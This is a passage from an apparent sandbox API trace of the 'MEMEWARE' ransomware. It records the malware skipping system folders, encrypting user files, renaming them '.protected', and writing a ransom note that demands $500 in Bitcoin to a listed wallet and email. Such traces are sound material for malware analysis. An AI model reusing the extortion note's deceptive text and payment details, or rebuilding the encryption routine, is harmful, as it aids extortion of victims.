SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.649] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0086.650] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.650] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.650] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.650] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0086.650] CloseHandle (hObject=0x154) returned 1 [0086.650] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.651] lstrcmpiW (lpString1="_CACHE_CLEAN_", lpString2="Windows") returned -1 [0086.651] lstrcmpiW (lpString1="_CACHE_CLEAN_", lpString2="Program Files") returned -1 [0086.651] lstrcmpiW (lpString1="_CACHE_CLEAN_", lpString2="Program Files (x86)") returned -1 [0086.651] lstrcmpiW (lpString1="_CACHE_CLEAN_", lpString2="$Recycle.bin") returned 1 [0086.651] lstrcmpiW (lpString1="_CACHE_CLEAN_", lpString2="System Volume Information") returned -1 [0086.651] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_") returned 103 [0086.651] StrStrIW (lpFirst="_CACHE_CLEAN_", lpSrch=".protected") returned 0x0 [0086.651] lstrcmpW (lpString1="_CACHE_CLEAN_", lpString2="RESTORE_FILES.txt") returned -1 [0086.651] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.651] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.651] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_") returned 103 [0086.651] StrStrW (lpFirst="_CACHE_CLEAN_", lpSrch=".txt") returned 0x0 [0086.651] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_") returned 103 [0086.651] StrStrW (lpFirst="_CACHE_CLEAN_", lpSrch=".rar") returned 0x0 [0086.651] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_") returned 103 [0086.651] StrStrW (lpFirst="_CACHE_CLEAN_", lpSrch=".zip") returned 0x0 [0086.652] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x1, lpOverlapped=0x0) returned 1 [0086.652] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.652] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x1, lpOverlapped=0x0) returned 1 [0086.653] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.653] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0086.653] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0086.654] CloseHandle (hObject=0x154) returned 1 [0086.654] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_.protected") returned 113 [0086.654] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_.protected")) returned 1 [0086.655] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0086.655] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0086.655] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\RESTORE_FILES.txt") returned 107 [0086.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.656] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.656] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0086.656] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.656] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0086.657] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.657] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0086.657] CloseHandle (hObject=0x150) returned 1 [0086.658] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0086.658] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0086.658] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\RESTORE_FILES.txt") returned 90 [0086.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0086.659] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.659] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0086.660] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.660] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.660] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.660] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0086.660] CloseHandle (hObject=0x14c) returned 1 [0086.661] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0086.661] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0086.661] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\RESTORE_FILES.txt") returned 81 [0086.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.662] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.662] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0086.662] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.662] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0086.663] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.663] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0086.663] CloseHandle (hObject=0xd8) returned 1 [0086.663] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.663] lstrcmpiW (lpString1="updates", lpString2="Windows") returned -1 [0086.663] lstrcmpiW (lpString1="updates", lpString2="Program Files") returned 1 [0086.663] lstrcmpiW (lpString1="updates", lpString2="Program Files (x86)") returned 1 [0086.663] lstrcmpiW (lpString1="updates", lpString2="$Recycle.bin") returned 1 [0086.663] lstrcmpiW (lpString1="updates", lpString2="System Volume Information") returned 1 [0086.663] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates") returned 63 [0086.663] lstrcmpW (lpString1="updates", lpString2=".") returned 1 [0086.663] lstrcmpW (lpString1="updates", lpString2="..") returned 1 [0086.663] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\*") returned 65 [0086.663] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0086.663] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.663] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.663] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.664] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.664] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.664] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\.") returned 65 [0086.664] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.664] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.664] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.664] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.664] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.664] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.664] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.664] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\..") returned 66 [0086.664] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.664] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.664] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.664] lstrcmpiW (lpString1="E7CF176E110C211B", lpString2="Windows") returned -1 [0086.664] lstrcmpiW (lpString1="E7CF176E110C211B", lpString2="Program Files") returned -1 [0086.664] lstrcmpiW (lpString1="E7CF176E110C211B", lpString2="Program Files (x86)") returned -1 [0086.664] lstrcmpiW (lpString1="E7CF176E110C211B", lpString2="$Recycle.bin") returned 1 [0086.664] lstrcmpiW (lpString1="E7CF176E110C211B", lpString2="System Volume Information") returned -1 [0086.664] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B") returned 80 [0086.664] lstrcmpW (lpString1="E7CF176E110C211B", lpString2=".") returned 1 [0086.664] lstrcmpW (lpString1="E7CF176E110C211B", lpString2="..") returned 1 [0086.664] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\*") returned 82 [0086.664] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0086.677] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.677] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.677] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.677] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.677] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.677] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\.") returned 82 [0086.677] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.677] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.677] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.677] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.677] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.677] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.677] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.677] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\..") returned 83 [0086.678] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.678] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.678] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.678] lstrcmpiW (lpString1="active-update.xml", lpString2="Windows") returned -1 [0086.678] lstrcmpiW (lpString1="active-update.xml", lpString2="Program Files") returned -1 [0086.678] lstrcmpiW (lpString1="active-update.xml", lpString2="Program Files (x86)") returned -1 [0086.678] lstrcmpiW (lpString1="active-update.xml", lpString2="$Recycle.bin") returned 1 [0086.678] lstrcmpiW (lpString1="active-update.xml", lpString2="System Volume Information") returned -1 [0086.678] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 